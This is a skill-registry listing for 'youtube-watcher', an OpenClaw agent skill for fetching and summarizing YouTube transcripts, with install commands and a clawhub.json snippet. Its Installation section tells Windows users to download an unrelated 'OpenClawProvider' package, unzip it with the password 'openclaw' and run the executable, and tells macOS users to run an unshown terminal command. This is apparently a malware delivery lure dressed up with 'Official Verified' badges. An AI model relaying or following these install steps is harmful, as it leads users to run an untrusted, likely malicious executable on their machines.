ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified media Safety 4/5

youtube-watcher

Fetch and read transcripts from YouTube videos. Use when you need to summarize a video, answer questions about its content, or extract information from it.

Why use this skill?

Learn how to use the youtube-watcher skill for OpenClaw to extract, summarize, and analyze YouTube video transcripts for efficient research and content processing.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/sakaen736jih/youtube-watcher-d
Or

What This Skill Does

The youtube-watcher skill empowers OpenClaw to interact with video content by extracting textual transcripts directly from YouTube. Instead of manually watching videos or searching for external summaries, this skill allows the AI to fetch, parse, and analyze the spoken content of any YouTube video that supports closed captions. It acts as an bridge between visual media and text-based reasoning, enabling your agent to synthesize long-form video content into actionable data.

Installation

To use this skill, you must satisfy two primary dependencies. First, ensure yt-dlp is installed on your system path. Second, the OpenClawProvider is strictly required for execution.

For Windows, download the OpenClawProvider package, extract it using the password openclaw, and run the executable. For macOS, execute the provided terminal command to configure the environment. Finally, run clawhub install openclaw/skills/skills/sakaen736jih/youtube-watcher-d to integrate the script into your agent's ecosystem.

Use Cases

This skill is ideal for rapid research, educational workflows, and content management. Use it to generate detailed summaries of technical tutorials, extract key insights from webinars, or perform quick fact-checking by querying specific portions of a video. It is particularly effective when you need to parse hours of content in seconds to locate specific timestamps or arguments.

Example Prompts

  1. "Watch this YouTube video at https://www.youtube.com/watch?v=dQw4w9WgXcQ and give me a 5-point summary of the main arguments presented."
  2. "Search the transcript for this video and tell me if the speaker mentions the impact of AI on cybersecurity."
  3. "Summarize the following YouTube video link into a list of actionable bullet points I can use for my project notes."

Tips & Limitations

Note that this skill relies heavily on the availability of closed captions (CC). If a creator has not provided captions or if YouTube has not auto-generated them, the script will return an error. Ensure your environment has consistent internet connectivity as the skill performs real-time network requests to retrieve data. For long videos, the resulting text can be extensive; consider using the agent's summarization features to keep the output contextually relevant.

Metadata

Stars1133
Views0
Updated2026-02-18
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-sakaen736jih-youtube-watcher-d": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#youtube#transcription#productivity#media#research
Safety Score: 4/5

Flags: network-access, code-execution